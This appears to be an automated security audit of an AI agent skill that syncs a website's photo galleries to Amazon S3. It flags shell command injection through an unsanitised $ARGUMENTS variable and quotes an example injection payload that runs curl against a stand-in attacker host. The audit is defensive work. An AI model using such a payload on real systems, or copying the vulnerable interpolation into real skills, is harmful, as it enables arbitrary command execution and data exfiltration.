Skills
skills/forever-efficient/pitfal-solutions-website/sync-content/Gen Agent Trust Hub

sync-content

Fail

Audited by Gen Agent Trust Hub on Feb 17, 2026

Risk Level: HIGHCOMMAND_EXECUTIONDATA_EXFILTRATION
Full Analysis
  • COMMAND_EXECUTION (HIGH): The skill is vulnerable to shell command injection via the $ARGUMENTS variable in SKILL.md. Evidence: The command aws s3 sync ./content/galleries/$ARGUMENTS/ s3://pitfal-media/galleries/$ARGUMENTS/ performs direct string interpolation of the argument. An attacker providing an argument like ; curl http://attacker.com/$(whoami); could execute arbitrary code.
  • DATA_EXFILTRATION (LOW): The skill naturally performs network operations to AWS S3 as part of its primary purpose. Evidence: aws s3 sync commands. While intended, the command injection vulnerability mentioned above elevates the risk that sensitive system files could be exfiltrated alongside the gallery content.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Feb 17, 2026, 06:28 PM